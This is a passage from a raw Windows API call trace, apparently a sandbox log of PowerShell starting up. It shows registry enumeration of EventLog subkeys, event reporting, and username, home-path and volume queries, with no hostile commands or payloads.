lpcSubKeys=0x24e304*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24e300*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.157] RegEnumKeyExW (in: hKey=0x1e8, dwIndex=0x0, lpName=0x338390, lpcchName=0x24e320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x24e320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.157] RegEnumKeyExW (in: hKey=0x1e8, dwIndex=0x1, lpName=0x338390, lpcchName=0x24e320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x24e320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.158] RegEnumKeyExW (in: hKey=0x1e8, dwIndex=0x2, lpName=0x338390, lpcchName=0x24e320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x24e320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.158] RegEnumKeyExW (in: hKey=0x1e8, dwIndex=0x3, lpName=0x338390, lpcchName=0x24e320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x24e320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.158] RegEnumKeyExW (in: hKey=0x1e8, dwIndex=0x4, lpName=0x338390, lpcchName=0x24e320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x24e320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.158] RegEnumKeyExW (in: hKey=0x1e8, dwIndex=0x5, lpName=0x338390, lpcchName=0x24e320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x24e320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.158] RegEnumKeyExW (in: hKey=0x1e8, dwIndex=0x6, lpName=0x338390, lpcchName=0x24e320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x24e320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.158] RegEnumKeyExW (in: hKey=0x1e8, dwIndex=0x7, lpName=0x338390, lpcchName=0x24e320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x24e320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.159] RegEnumKeyExW (in: hKey=0x1e8, dwIndex=0x8, lpName=0x338390, lpcchName=0x24e320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x24e320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.159] RegOpenKeyExW (in: hKey=0x1e8, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2cc | out: phkResult=0x24e2cc*=0x364) returned 0x0 [0146.159] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2cc | out: phkResult=0x24e2cc*=0x0) returned 0x2 [0146.159] RegOpenKeyExW (in: hKey=0x1e8, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2cc | out: phkResult=0x24e2cc*=0x368) returned 0x0 [0146.159] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2cc | out: phkResult=0x24e2cc*=0x0) returned 0x2 [0146.159] RegOpenKeyExW (in: hKey=0x1e8, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2cc | out: phkResult=0x24e2cc*=0x36c) returned 0x0 [0146.160] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2cc | out: phkResult=0x24e2cc*=0x0) returned 0x2 [0146.160] RegOpenKeyExW (in: hKey=0x1e8, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2cc | out: phkResult=0x24e2cc*=0x370) returned 0x0 [0146.160] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2cc | out: phkResult=0x24e2cc*=0x0) returned 0x2 [0146.160] RegOpenKeyExW (in: hKey=0x1e8, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2cc | out: phkResult=0x24e2cc*=0x374) returned 0x0 [0146.160] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2cc | out: phkResult=0x24e2cc*=0x0) returned 0x2 [0146.160] RegOpenKeyExW (in: hKey=0x1e8, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2cc | out: phkResult=0x24e2cc*=0x378) returned 0x0 [0146.161] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2cc | out: phkResult=0x24e2cc*=0x0) returned 0x2 [0146.161] RegOpenKeyExW (in: hKey=0x1e8, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2cc | out: phkResult=0x24e2cc*=0x0) returned 0x5 [0146.163] RegOpenKeyExW (in: hKey=0x1e8, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2cc | out: phkResult=0x24e2cc*=0x37c) returned 0x0 [0146.163] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2cc | out: phkResult=0x24e2cc*=0x0) returned 0x2 [0146.164] RegOpenKeyExW (in: hKey=0x1e8, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2cc | out: phkResult=0x24e2cc*=0x380) returned 0x0 [0146.164] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2cc | out: phkResult=0x24e2cc*=0x384) returned 0x0 [0146.164] RegCloseKey (hKey=0x384) returned 0x0 [0146.164] RegCloseKey (hKey=0x1e8) returned 0x0 [0146.164] RegCloseKey (hKey=0x380) returned 0x0 [0146.165] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e29c | out: phkResult=0x24e29c*=0x380) returned 0x0 [0146.165] RegQueryInfoKeyW (in: hKey=0x380, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24e304, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24e300, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24e304*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24e300*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.165] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x0, lpName=0x338390, lpcchName=0x24e320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x24e320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.165] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x1, lpName=0x338390, lpcchName=0x24e320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x24e320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.165] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x2, lpName=0x338390, lpcchName=0x24e320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x24e320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.165] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x3, lpName=0x338390, lpcchName=0x24e320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x24e320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.165] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x4, lpName=0x338390, lpcchName=0x24e320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x24e320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.166] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x5, lpName=0x338390, lpcchName=0x24e320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x24e320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.166] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x6, lpName=0x338390, lpcchName=0x24e320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x24e320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.166] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x7, lpName=0x338390, lpcchName=0x24e320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x24e320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.166] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x8, lpName=0x338390, lpcchName=0x24e320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x24e320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.166] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2cc | out: phkResult=0x24e2cc*=0x1e8) returned 0x0 [0146.166] RegOpenKeyExW (in: hKey=0x1e8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2cc | out: phkResult=0x24e2cc*=0x0) returned 0x2 [0146.167] RegOpenKeyExW (in: hKey=0x380, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2cc | out: phkResult=0x24e2cc*=0x384) returned 0x0 [0146.167] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2cc | out: phkResult=0x24e2cc*=0x0) returned 0x2 [0146.167] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2cc | out: phkResult=0x24e2cc*=0x388) returned 0x0 [0146.167] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2cc | out: phkResult=0x24e2cc*=0x0) returned 0x2 [0146.167] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2cc | out: phkResult=0x24e2cc*=0x38c) returned 0x0 [0146.168] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2cc | out: phkResult=0x24e2cc*=0x0) returned 0x2 [0146.168] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2cc | out: phkResult=0x24e2cc*=0x390) returned 0x0 [0146.168] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2cc | out: phkResult=0x24e2cc*=0x0) returned 0x2 [0146.168] RegOpenKeyExW (in: hKey=0x380, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2cc | out: phkResult=0x24e2cc*=0x394) returned 0x0 [0146.168] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2cc | out: phkResult=0x24e2cc*=0x0) returned 0x2 [0146.168] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2cc | out: phkResult=0x24e2cc*=0x0) returned 0x5 [0146.171] RegOpenKeyExW (in: hKey=0x380, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2cc | out: phkResult=0x24e2cc*=0x398) returned 0x0 [0146.171] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2cc | out: phkResult=0x24e2cc*=0x0) returned 0x2 [0146.172] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2cc | out: phkResult=0x24e2cc*=0x39c) returned 0x0 [0146.172] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2cc | out: phkResult=0x24e2cc*=0x3a0) returned 0x0 [0146.172] RegCloseKey (hKey=0x3a0) returned 0x0 [0146.172] RegCloseKey (hKey=0x380) returned 0x0 [0146.173] RegCloseKey (hKey=0x39c) returned 0x0 [0146.173] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e290 | out: phkResult=0x24e290*=0x39c) returned 0x0 [0146.173] RegQueryInfoKeyW (in: hKey=0x39c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24e2f8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24e2f4, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24e2f8*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24e2f4*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.173] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x0, lpName=0x338390, lpcchName=0x24e314, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x24e314, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.174] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x1, lpName=0x338390, lpcchName=0x24e314, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x24e314, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.174] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x2, lpName=0x338390, lpcchName=0x24e314, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x24e314, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.174] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x3, lpName=0x338390, lpcchName=0x24e314, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x24e314, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.174] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x4, lpName=0x338390, lpcchName=0x24e314, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x24e314, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.174] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x5, lpName=0x338390, lpcchName=0x24e314, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x24e314, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.174] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x6, lpName=0x338390, lpcchName=0x24e314, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x24e314, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.175] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x7, lpName=0x338390, lpcchName=0x24e314, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x24e314, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.175] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x8, lpName=0x338390, lpcchName=0x24e314, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x24e314, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.175] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2c0 | out: phkResult=0x24e2c0*=0x380) returned 0x0 [0146.175] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2c0 | out: phkResult=0x24e2c0*=0x0) returned 0x2 [0146.175] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2c0 | out: phkResult=0x24e2c0*=0x3a0) returned 0x0 [0146.176] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2c0 | out: phkResult=0x24e2c0*=0x0) returned 0x2 [0146.176] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2c0 | out: phkResult=0x24e2c0*=0x3a4) returned 0x0 [0146.176] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2c0 | out: phkResult=0x24e2c0*=0x0) returned 0x2 [0146.176] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2c0 | out: phkResult=0x24e2c0*=0x3a8) returned 0x0 [0146.176] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2c0 | out: phkResult=0x24e2c0*=0x0) returned 0x2 [0146.176] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2c0 | out: phkResult=0x24e2c0*=0x3ac) returned 0x0 [0146.177] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2c0 | out: phkResult=0x24e2c0*=0x0) returned 0x2 [0146.177] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2c0 | out: phkResult=0x24e2c0*=0x3b0) returned 0x0 [0146.177] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2c0 | out: phkResult=0x24e2c0*=0x0) returned 0x2 [0146.177] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2c0 | out: phkResult=0x24e2c0*=0x0) returned 0x5 [0146.179] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2c0 | out: phkResult=0x24e2c0*=0x3b4) returned 0x0 [0146.180] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2c0 | out: phkResult=0x24e2c0*=0x0) returned 0x2 [0146.180] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2c0 | out: phkResult=0x24e2c0*=0x3b8) returned 0x0 [0146.180] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2c0 | out: phkResult=0x24e2c0*=0x3bc) returned 0x0 [0146.180] RegCloseKey (hKey=0x3bc) returned 0x0 [0146.180] RegCloseKey (hKey=0x39c) returned 0x0 [0146.180] RegCloseKey (hKey=0x3b8) returned 0x0 [0146.194] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x4e90004 [0146.198] GetLastError () returned 0x0 [0146.200] ReportEventW (hEventLog=0x4e90004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x343a450*="WSMan", lpRawData=0x343a2f8) returned 1 [0146.203] GetLastError () returned 0x0 [0146.204] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0146.204] GetLastError () returned 0xcb [0146.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24de34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.205] GetLastError () returned 0xcb [0146.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dde4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.205] GetLastError () returned 0xcb [0146.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dde4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.205] GetLastError () returned 0xcb [0146.205] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x338b50, nSize=0x24e434 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x24e434) returned 0x1 [0146.212] GetLastError () returned 0xcb [0146.212] GetUserNameW (in: lpBuffer=0x338390, pcbBuffer=0x24e43c | out: lpBuffer="aETAdzjz", pcbBuffer=0x24e43c) returned 1 [0146.212] ReportEventW (hEventLog=0x4e90004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x343e2d8*="Alias", lpRawData=0x343e194) returned 1 [0146.213] GetLastError () returned 0x0 [0146.214] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0146.214] GetLastError () returned 0xcb [0146.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24de34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.214] GetLastError () returned 0xcb [0146.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dde4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.214] GetLastError () returned 0xcb [0146.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dde4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.214] GetLastError () returned 0xcb [0146.215] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x338b50, nSize=0x24e434 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x24e434) returned 0x1 [0146.215] GetLastError () returned 0xcb [0146.215] GetUserNameW (in: lpBuffer=0x338390, pcbBuffer=0x24e43c | out: lpBuffer="aETAdzjz", pcbBuffer=0x24e43c) returned 1 [0146.216] ReportEventW (hEventLog=0x4e90004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3442218*="Environment", lpRawData=0x34420d4) returned 1 [0146.216] GetLastError () returned 0x0 [0146.217] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0146.217] GetLastError () returned 0xcb [0146.218] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0146.218] GetLastError () returned 0xcb [0146.218] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf [0146.218] GetLastError () returned 0xcb [0146.218] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x24df64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11 [0146.218] GetLastError () returned 0xcb [0146.218] SetErrorMode (uMode=0x1) returned 0x1 [0146.218] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x24e3e4 | out: lpFileInformation=0x24e3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0146.218] GetLastError () returned 0xcb [0146.218] SetErrorMode (uMode=0x1) returned 0x1 [0146.229] GetLogicalDrives () returned 0x4 [0146.229] GetLastError () returned 0xcb [0146.248] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24de88, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0146.248] GetLastError () returned 0xcb [0146.248] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0146.248] GetLastError () returned 0xcb [0146.249] SetErrorMode (uMode=0x1) returned 0x1 [0146.250] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x338490, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x24e3b0, lpMaximumComponentLength=0x24e3ac, lpFileSystemFlags=0x24e3a8, lpFileSystemNameBuffer=0x338390, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24e3b0*=0x705ba84c, lpMaximumComponentLength=0x24e3ac*=0xff, lpFileSystemFlags=0x24e3a8*=0x3e700ff, 